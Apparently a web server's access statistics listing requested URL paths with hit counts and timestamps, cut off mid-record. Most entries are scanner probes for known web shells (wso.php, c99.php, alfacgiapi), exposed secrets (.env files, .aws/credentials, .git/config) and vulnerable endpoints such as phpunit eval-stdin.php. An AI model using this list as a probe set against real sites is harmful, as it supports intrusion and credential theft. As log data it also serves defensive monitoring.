/jq.php 1 2 0 0 0 29250912 0 0 29250912 0 0 656 /_autoindex/assets/icons/corner-left-up.svg 1 0 0 0 13 0 0 29389153 0 0 28598316 0 /about 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /testas.php 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /anskrit.php 1 0 0 0 3 0 0 29327095 0 0 29294468 0 /resp.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /35.php 1 0 0 0 2 0 0 29410639 0 0 29313913 0 /main 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /dlu.php 1 0 0 0 11 0 0 29388027 0 0 29282380 0 /error.php 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /10266.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /.well-known/fm.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.staging 1 0 0 2 0 0 29403002 0 0 29180151 0 0 /cgi-bin 1 0 0 0 6 0 0 29362131 0 0 29277539 0 /size.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /nxac.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /packages/api/.env 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /app/config.json 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /abt.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-includes/autoload_classmap.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /pinfo.php 1 0 0 0 13 0 0 29389153 0 0 28598316 0 /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application 1 0 0 0 3 0 0 29327095 0 0 29294468 0 /tox.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /wp-admin/css/colors/midnight/about.php 1 2 0 0 1 29250910 0 29250911 29250910 0 29250911 17977 /akcc.php?p= 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /aomanalyzer/.git/config 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /lock.php 1 0 0 0 2 0 0 29361766 0 0 29358152 0 /rest 1 0 0 0 1 0 0 29210039 0 0 29210039 0 /wp-admin/user/iR7SzrsOUEP.php 1 0 0 0 2 0 0 28989273 0 0 28984122 0 /assets/plugins/jquery.filer/php/readme.txt 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /fs6.php 1 0 0 0 7 0 0 29362131 0 0 29277539 0 /goat.php 1 0 0 0 5 0 0 29388632 0 0 29367838 0 /ant.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /qa/.git/config 1 0 0 0 4 0 0 29388631 0 0 29291986 0 /asasx.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /0xx.php 1 0 0 0 2 0 0 29362131 0 0 29358831 0 /133.php 1 0 0 0 5 0 0 29415130 0 0 29367838 0 /htaccess.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /awh77.php 1 0 0 0 2 0 0 29327096 0 0 29294468 0 /karak.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /89.php 1 0 0 0 11 0 0 29388027 0 0 29299891 0 /file18.php 1 0 0 0 4 0 0 29388027 0 0 29326315 0 /cabs.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /past.php 1 0 0 0 3 0 0 29388632 0 0 29277539 0 /wp-mn.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-includes/html-api/wp-conflg.php?p= 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /whf.php 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /wp-xrm.php 1 0 0 0 2 0 0 29410639 0 0 29313894 0 /demo 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /nbm.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /plugins/pwnd/as.php 1 0 0 0 6 0 0 29362131 0 0 29294468 0 /bolt.php 1 28 28 0 0 28658880 0 0 28599309 0 0 30730 /?195.211.77.140 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /flower.php 1 0 0 0 7 0 0 29415130 0 0 29211744 0 /install.php 1 0 0 0 1 0 0 29329147 0 0 29329147 0 /ron.php 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /dump.sql 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /.bod/.ll/ss.php 1 0 0 0 4 0 0 29354064 0 0 29291986 0 /wp-content/plugins/hellopress/wp_filemanager.php?147.93.158.41 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-configs.php? 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /logout.php 1 0 0 0 5 0 0 29384959 0 0 29277821 0 /wso.php 1 0 0 0 13 0 0 29415130 0 0 29299891 0 /333.php 1 0 0 0 6 0 0 29415130 0 0 29368602 0 /wp-content/plugins/hellopress/wp_filemanager.php?109.196.75.89 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /wp-content/403.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /shell.aspx 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /2020.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /0xs.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /d0rk.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /lufix.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env-sample 1 0 0 0 2 0 0 29187279 0 0 29187258 0 /sftp.json 1 0 0 0 11 0 0 29415130 0 0 29367838 0 /403.php 1 0 0 0 2 0 0 29329146 0 0 29326315 0 /wp-cron.php 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /lite.php 1 0 0 0 6 0 0 29388632 0 0 29365498 0 /up.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /ty.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/extension/payment.php 1 0 0 0 1 0 0 29299891 0 0 29299891 0 /file13.php 1 0 0 0 1 0 0 29306748 0 0 29306748 0 /xhouf.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /db.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.bak 1 4 0 0 0 28773963 0 0 28773963 0 0 348 /.well-known/acme-challenge/sD0wCiQWCChPFIxEPrewABI5bL97osprMPMqCGT-Si4 1 0 0 0 5 0 0 29415130 0 0 29354064 0 /wp-admin/maint/index.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /yzkvrell.php 1 0 0 0 33 0 0 29370693 0 0 28687376 0 /robots.txt 1 0 0 0 6 0 0 29415130 0 0 29326315 0 /ton.php 1 0 0 0 4 0 0 29388632 0 0 29294468 0 /mjq.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /user.php 1 0 0 0 6 0 0 29415130 0 0 29278577 0 /w.php 1 0 0 0 5 0 0 29388027 0 0 29326315 0 /aves.php 1 0 0 0 1 0 0 29359668 0 0 29359668 0 /public_html 1 0 0 0 8 0 0 29388027 0 0 29326315 0 /fileas.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /xpas22.php 1 0 0 0 4 0 0 29325243 0 0 28620679 0 /public/.env 1 0 0 0 21 0 0 29415130 0 0 29277539 0 /ioxi-o.php 1 0 0 0 4 0 0 29325243 0 0 28620679 0 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /shell.sh 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /ok.php 1 0 0 0 4 0 0 29410639 0 0 29210008 0 /wp-admin/setup-config.php 1 0 0 0 1 0 0 29187198 0 0 29187198 0 /ALFA_DATA/alfacgiapi 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /sitemaps/.env 1 0 0 0 3 0 0 29416373 0 0 29388817 0 /logs/debug.log 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /btufulhs.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /use.php 1 0 0 0 6 0 0 29372859 0 0 29299891 0 /ssss.php 1 1 0 0 0 28773962 0 0 28773962 0 0 64 /.well-known/acme-challenge/PQUYNBLKIDE6-H7PK1W31LFP4NO944B3 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /aa8.php 1 0 0 0 3 0 0 29359668 0 0 29325294 0 /yanz.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /shell.py 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /settings.php 1 0 0 0 3 0 0 29388632 0 0 29384960 0 /aua.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /cache.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /shell.rb 1 0 0 0 1 0 0 29416373 0 0 29416373 0 /symfony/_profiler/phpinfo 1 0 0 0 19 0 0 29393907 0 0 28968133 0 /sito/wp-includes/wlwmanifest.xml 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /cf.php 1 0 0 0 2 0 0 29388631 0 0 29386475 0 /thai.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /shell.pl 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /wp-x7.php 1 0 0 0 2 0 0 29368602 0 0 29367838 0 /class-wp.php 1 0 0 0 2 0 0 29329147 0 0 29326315 0 /Llj.php 1 0 0 0 6 0 0 29359668 0 0 29278577 0 /r.php 1 0 0 0 3 0 0 29359668 0 0 29325294 0 /marijuana.php 1 0 0 0 1 0 0 29250911 0 0 29250911 0 /akcc.php?copy=akcc.php&p=.well-known 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.env.config 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /store.php 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /bless10.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /%c0 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /wp-xm.php 1 0 0 0 3 0 0 29388632 0 0 29306748 0 /wander.php 1 0 0 0 2 0 0 29388631 0 0 29386475 0 /blue.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/config.json 1 0 0 0 2 0 0 29278576 0 0 29211745 0 /wp-admin/network/index.php 1 0 0 0 10 0 0 29388632 0 0 29291986 0 /13.php 1 0 0 0 3 0 0 29384960 0 0 29291986 0 /autoload_classmap.php 1 0 0 0 19 0 0 29415130 0 0 29291986 0 /css.php 1 0 0 0 2 0 0 29250911 0 0 29250911 0 /akcc.php?del=cgi-bin&p= 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /gif.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /sk25_1.php 1 0 0 0 1 0 0 29410639 0 0 29410639 0 /portal 1 0 0 0 13 0 0 29211399 0 0 28691360 0 /sitemap.xml 1 0 0 0 5 0 0 29415130 0 0 29367838 0 /sx.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /unity.php 1 0 0 0 8 0 0 29410639 0 0 29006385 0 /old 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /common.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /v2/.env 1 0 0 0 10 0 0 29388632 0 0 29326315 0 /7.php 1 0 0 0 7 0 0 29415130 0 0 29325294 0 /as.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /files.php 1 1 0 0 0 29037484 0 0 29037484 0 0 64 /.well-known/acme-challenge/SCGIXQHZN81HJ87T5KHG08RU4N1CDPQC 1 0 0 0 6 0 0 29388027 0 0 29354065 0 /zde.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /juuuu.php 1 0 0 0 5 0 0 29415130 0 0 29278577 0 /m.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /upload/wp-info.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /beta/.env 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /cwsd.php 1 0 0 0 1 0 0 28777719 0 0 28777719 0 /.env_exemple 1 0 0 0 1 0 0 29187252 0 0 29187252 0 /Telerik.Web.UI.WebResource.axd?type=rau 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /shell.js 1 25 25 0 5 29015490 0 28923521 28785181 0 28782312 15990 /?104.166.80.124 1 0 0 0 1 0 0 29389153 0 0 29389153 0 /api/swagger.json 1 0 0 0 4 0 0 29388817 0 0 28777719 0 /php_info.php 1 123 0 0 0 29359012 0 0 28598316 0 0 333997 /_autoindex/assets/js/tablesort.js 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /wp-config.php.bak 1 0 0 0 1 0 0 29341248 0 0 29341248 0 /let.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /.well-known/admin.php 1 0 0 0 2 0 0 29384959 0 0 29277539 0 /111.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /ggs.php 1 0 0 0 2 0 0 28694984 0 0 28693290 0 /.git/config?199.45.154.72 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /file8.php 1 0 0 0 8 0 0 29415130 0 0 29210006 0 /css/index.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-includes/fonts/index.php?p= 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /production/.env 1 0 0 0 3 0 0 29388632 0 0 29384959 0 /ss.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /tj.php 1 0 0 0 3 0 0 29325243 0 0 28620679 0 /vendor/.env 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /s3/.git/config 1 0 0 0 2 0 0 29250913 0 0 29250911 0 /akcc.php?copy=cgi-bin&p= 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /uploadx.php 1 0 0 0 10 0 0 29388632 0 0 29326315 0 /thh.php 1 0 0 0 9 0 0 29388632 0 0 29325293 0 /2.php 1 0 0 0 4 0 0 29325243 0 0 28620679 0 /app/.env 1 0 0 0 6 0 0 29415130 0 0 29325293 0 /radio.php 1 0 0 0 8 0 0 29388632 0 0 29299891 0 /an.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /admin/controller/setting/user.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /bv3.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /claa.php 1 4 4 0 0 29273719 0 0 29176024 0 0 2514 /?SD 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /h.php 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /fw.php 1 0 0 0 11 0 0 29388027 0 0 29326315 0 /he.php 1 4 4 0 0 29273719 0 0 29176024 0 0 2586 /?SA 1 0 0 0 6 0 0 29362131 0 0 29326315 0 /sec.php 1 7 0 0 0 29272255 0 0 29041404 0 0 16063 /_autoindex/assets/js/tablesort.js?192.42.116.194 1 0 0 0 1 0 0 29323749 0 0 29323749 0 /media/system/js/core.js 1 0 0 0 1 0 0 28901921 0 0 28901921 0 /robots.txt?45.148.10.172 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /mail/.env 1 1 1 0 0 29248560 0 0 29248560 0 0 609 /?pp=env&pp=env 1 1 0 0 0 29069110 0 0 29069110 0 0 322 /_autoindex/assets/js/tablesort.number.js?192.42.116.194 1 0 0 0 8 0 0 29388632 0 0 29325293 0 /02.php 1 0 0 0 2 0 0 28673027 0 0 28669512 0 /favicon.ico?199.45.154.72 1 0 0 0 1 0 0 29129499 0 0 29129499 0 /docs/.git/config 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /1887.php 1 0 0 0 3 0 0 29415130 0 0 29365498 0 /we2.php 1 0 0 0 1 0 0 29307744 0 0 29307744 0 /robots.txt?147.93.158.41 1 0 0 0 3 0 0 29362131 0 0 29354064 0 /a3.php 1 0 0 0 2 0 0 29326315 0 0 29299891 0 /file3.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /indoxploit.php 1 0 0 0 12 0 0 29388027 0 0 29277539 0 /geck.php 1 0 0 0 1 0 0 29210011 0 0 29210011 0 /cgi-bin/users.php 1 0 0 0 2 0 0 29405740 0 0 29405245 0 /robots.txt?109.196.75.89 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /bqcheck.php 1 0 0 0 2 0 0 29278578 0 0 29278578 0 /index.php 1 0 0 0 6 0 0 29372859 0 0 29354065 0 /max.php 1 0 0 0 1 0 0 29187250 0 0 29187250 0 /wp-content/themes/seotheme/db.php?u 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /wp-includes/wp-db.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /fwe.php 1 0 0 0 1 0 0 29313890 0 0 29313890 0 /TEST 1 0 0 0 3 0 0 29388631 0 0 29306748 0 /filei.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /config/secrets.json 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /ze.php 1 0 0 0 3 0 0 29388632 0 0 29384959 0 /shlo.php 1 0 0 0 4 0 0 29388632 0 0 29306748 0 /gold.php 1 0 0 0 5 0 0 29359668 0 0 29278577 0 /c.php 1 0 0 0 1 0 0 29140866 0 0 29140866 0 /sftp-config.json?192.42.116.194 1 0 0 0 10 0 0 29265176 0 0 29029541 0 /favicon.ico?192.42.116.194 1 1 0 0 1 29250911 0 29250912 29250911 0 29250912 255950 /akcc.php?dl=akcc.php&p= 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /gi.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /src/.env 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /fosil.php 1 5 0 0 0 28686123 0 0 28686123 0 0 435 /.well-known/acme-challenge/To2zipgqJBo9GJvMWVjjpoB1w1kECJqSVfmbmFa91M0 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /cmd.php 1 0 0 0 6 0 0 29372859 0 0 29354065 0 /030.php 1 0 0 0 15 0 0 29365182 0 0 28968133 0 /media/wp-includes/wlwmanifest.xml 1 4 4 0 0 29273719 0 0 29176024 0 0 2578 /?ND 1 0 0 0 1 0 0 29402814 0 0 29402814 0 /ww2.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /static/.git/config 1 4 4 0 0 29273719 0 0 29176024 0 0 2508 /?NA 1 0 0 0 1 0 0 29313904 0 0 29313904 0 /WWW 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /zc-903.php 1 0 0 0 2 0 0 29359668 0 0 29325294 0 /post.php 1 2 2 0 0 29250913 0 0 29250912 0 0 1336 /.well-known/?SD 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /EM.php 1 4 4 0 0 29273719 0 0 29176024 0 0 2518 /?MD 1 0 0 0 8 0 0 29220843 0 0 28696768 0 /wp-admin/setup-config.php?step=1 1 2 2 0 0 29250912 0 0 29250912 0 0 1338 /.well-known/?SA 1 4 4 0 0 29273719 0 0 29176024 0 0 2590 /?MA 1 0 0 0 4 0 0 29359668 0 0 29325293 0 /admin/upload/css.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /dev/info.php 1 0 0 0 1 0 0 29291986 0 0 29291986 0 /fork.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /administrator/administrator.php 1 5 0 0 0 28598314 0 0 28598314 0 0 435 /.well-known/acme-challenge/FtlWb8sQFU5Aqq8NP4XyHAqCaWEKjAFfCNhLzTShses 1 0 0 0 1 0 0 29211745 0 0 29211745 0 /.well-known/acme-challenge/mariju.php 1 0 0 0 1 0 0 29387122 0 0 29387122 0 /uuu.php 1 0 0 0 12 0 0 29388027 0 0 29354064 0 /enclas.php 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /error.log 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /func.php 1 52 0 0 0 29359012 0 0 28598316 0 0 65172 /_autoindex/assets/css/autoindex.css 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /.vscode/.env 1 0 0 0 2 0 0 29228316 0 0 29223857 0 /style.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /lib/phpunit/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /utf88.php 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /.wp-cli/wp-login.php 1 0 0 0 3 0 0 29359668 0 0 29325293 0 /alfanew.php 1 0 0 0 9 0 0 29410639 0 0 28995765 0 /new 1 0 0 0 11 0 0 29388632 0 0 29326315 0 /fm.php 1 1 0 0 0 29125503 0 0 29125503 0 0 64 /.well-known/acme-challenge/9LYKFPM25BQ53OCGXFH7224D_XJ_EI1I 1 0 0 0 3 0 0 29372859 0 0 29367838 0 /sck.php 1 0 0 0 1 0 0 29187228 0 0 29187228 0 /tmp_images/alfacgiapi/ 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /internal/config 1 0 0 0 10 0 0 29388027 0 0 29291986 0 /.well-known/acme-challenge/about.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /wolv2.php 1 0 0 0 1 0 0 29176994 0 0 29176994 0 http://www.ia.imators.com/?192.42.116.194 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /.npmrc 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /zt2.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /kyc/.env 1 0 0 0 1 0 0 29348354 0 0 29348354 0 /adminer.php?147.93.158.41 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /web.config 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /test/info.php 1 0 0 0 2 0 0 28989273 0 0 28984122 0 /assets/vendor/jquery.filer/php/readme.txt 1 0 0 0 1 0 0 29228723 0 0 29228723 0 /gdftps.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /x7.php 1 0 0 0 3 0 0 29361379 0 0 29210039 0 /xleet-shell.php 1 0 0 0 12 0 0 29372859 0 0 29291986 0 /system_log.php 1 2 2 0 0 29250912 0 0 29250911 0 0 1336 /.well-known/?ND 1 0 0 0 1 0 0 29388817 0 0 29388817 0 /gradle.properties 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /app/etc/env.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /.well-known/pki-validation/dropdown.php 1 2 2 0 0 29250912 0 0 29250912 0 0 1336 /.well-known/?NA 1 0 0 0 3 0 0 29415130 0 0 29365498 0 /about/function.php 1 0 0 0 2 0 0 29278578 0 0 29248560 0 /configuration.php 1 0 0 0 7 0 0 29416373 0 0 28775634 0 /.aws/credentials 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /conn.php 1 0 0 0 6 0 0 29388027 0 0 29326315 0 /fffff.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /ircshell.php 1 2 2 0 0 29250913 0 0 29250912 0 0 1338 /.well-known/?MD 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /xm.php 1 2 2 0 0 29250912 0 0 29250912 0 0 1340 /.well-known/?MA 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /mtvcrew.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /wp1.php 1 0 0 0 1 0 0 29313926 0 0 29313926 0 /BACKUP 1 0 0 0 1 0 0 29211743 0 0 29211743 0 /wp-includes/wp-login.php 1 0 0 0 8 0 0 29388631 0 0 29354064 0 /bless3.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /uploat.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /backdoor.php 1 0 0 0 4 0 0 29402814 0 0 29354065 0 /ifm.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /wp-includes/buy.php 1 0 0 0 6 0 0 29388027 0 0 29367838 0 /indo.php 1 0 0 0 1 0 0 29410639 0 0 29410639 0 /newsite 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /gecko.php 1 0 0 0 3 0 0 29388027 0 0 29383751 0 /admir.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /shell.php5 1 0 0 0 11 0 0 29415130 0 0 29299891 0 /2clas.php 1 0 0 0 2 0 0 29388631 0 0 29386475 0 /rh.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /app/.git/config 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /z60.php 1 0 0 0 2 0 0 29362131 0 0 29358831 0 /RsR.php 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /wp-content/themes/about.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /doc.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /xnxx.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /c99.php 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /wp670.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /backup/config.php 1 0 0 0 3 0 0 29416373 0 0 29248560 0 /.env.example 1 0 0 0 13 0 0 29389153 0 0 28598316 0 /v2/_catalog 1 5 0 0 0 29125506 0 0 29125506 0 0 435 /.well-known/acme-challenge/xS2iVvs7FNAm70kQyTeZsLQSc9a4C4dhrZQpBM_XMvw 1 0 0 0 4 0 0 29372859 0 0 29299891 0 /xrp.php 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /malo.php 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /700.php 1 0 0 0 2 0 0 29372859 0 0 29365498 0 /sto.php 1 23 23 0 4 29014554 0 28958685 28780700 0 28817230 18835 /?45.148.10.172 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /cron/.env 1 0 0 0 1 0 0 28775634 0 0 28775634 0 /config.xml 1 2 0 0 0 29250910 0 0 29250910 0 0 788 /_autoindex/assets/icons/file-text.svg 1 25 25 0 0 29361012 0 0 29291653 0 0 22443 /?147.93.158.41 1 17 17 0 0 29415662 0 0 29362482 0 0 8166 /?109.196.75.89 1 0 0 0 1 0 0 29210009 0 0 29210009 0 /wp-content/updraft/themes.php 1 0 0 0 5 0 0 29388631 0 0 29291986 0 /lc.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /database.yml 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /porn.php 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /bak.php 1 0 0 0 1 0 0 29210008 0 0 29210008 0 /wzy.php?action=door123 1 0 0 0 1 0 0 29416373 0 0 29416373 0 /app_dev.php/_profiler/phpinfo 1 0 0 0 2 0 0 29415130 0 0 29402814 0 /byp.php 1 0 0 0 1 0 0 28612865 0 0 28612865 0 /.git/?195.211.77.140 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /wp-includes/Text/wp-conflg.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /dng.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /login.php 1 0 0 0 9 0 0 29410639 0 0 28995765 0 /backup 1 0 0 0 1 0 0 29384960 0 0 29384960 0 /wcas.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /wp-admin/includes/theme.php 1 0 0 0 5 0 0 29359668 0 0 29277539 0 /xc.php 1 0 0 0 7 0 0 29388631 0 0 29354064 0 /naxc.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /store/.git/config 1 0 0 0 1 0 0 29187223 0 0 29187223 0 /wp-includes/alfacgiapi/ 1 0 0 0 22 0 0 29393907 0 0 28867962 0 /test/wp-includes/wlwmanifest.xml 1 0 0 0 2 0 0 29250912 0 0 29250912 0 /akcc.php?p=&settings=1 1 0 0 0 12 0 0 29301184 0 0 28598316 0 /s/5313e2731323e27383e2439313/_/ 1 0 0 0 11 0 0 29388027 0 0 29299891 0 /file88.php 1 0 0 0 1 0 0 29294468 0 0 29294468 0 /upgrade.php 1 0 0 0 1 0 0 29277539 0 0 29277539 0 /007.php 1 0 0 0 4 0 0 29384959 0 0 29367838 0 /blox.php 1 0 0 0 1 0 0 28604394 0 0 28604394 0 /samples/.git/config 1 0 0 0 9 0 0 29415130 0 0 29294468 0 /gifclass.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /development/.env 1 0 0 0 5 0 0 29362131 0 0 29326315 0 /xsox.php 1 0 0 0 2 0 0 29365498 0 0 29326315 0 /jp.php 1 0 0 0 8 0 0 29372859 0 0 29354064 0 /bless.php 1 0 0 0 2 0 0 29097720 0 0 29024029 0 /ads.txt?192.42.116.194 1 0 0 0 8 0 0 29220843 0 0 28696768 0 /wordpress/wp-admin/setup-config.php?step=1 1 0 0 0 11 0 0 29388027 0 0 29326315 0 /inde.php 1 0 0 0 2 0 0 29327095 0 0 29294468 0 /zcxb.php 1 0 0 0 1 0 0 29365498 0 0 29365498 0 /wp-admin/log.php 1 0 0 0 6 0 0 29392136 0 0 28612865 0 /.git/HEAD 1 0 0 0 2 0 0 29388632 0 0 29386475 0 /sarang.php 1 0 0 0 3 0 0 29325243 0 0 29248560 0 /apps/.env 1 0 0 0 3 0 0 29362131 0 0 29354065 0 /wsx.php 1 0 0 0 1 0 0 29384959 0 0 29384959 0 /wp-the1me.php 1 0 0 0 10 0 0 29388027 0 0 29325293 0 /build.php 1 0 0 0 14 0 0 29388632 0 0 29282380 0 /pp.php 1 0 0 0 6 0 0 29388817 0 0 29187277 0 /config/.env 1 0 0 0 3 0 0 29415130 0 0 29365498 0 /.well-known/log.php 1 0 0 0 10 0 0 29388632 0 0 29277539 0 /wp-gr.php 1 0 0 0 1 0 0 29278577 0 0 29278577 0 /stealthy_shell.php 1 0 0 0 2 0 0 29325243 0 0 29289142 0 /wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 1 0 0 0 1 0 0 29372859 0 0 29372859 0 /lopst.php 1 0 0 0 3 0 0 29327095 0 0 29291986 0 /MARIJUANA.php 1 0 0 0 1 0 0 29278578 0 0 29278578 0 /wp-admin/includes/post.php 1 0 0 0 1 0 0 29278576 0 0 29278576 0 /irc.php 1 0 0 0 1 0 0 29415130 0 0 29415130 0 /atx.php 1 0 0 0 1 0 0 29248560 0 0 29248560 0 /cms/.env 1 0 0 0 1 0 0 29313861 0 0 29313861 0 /2024 1 0 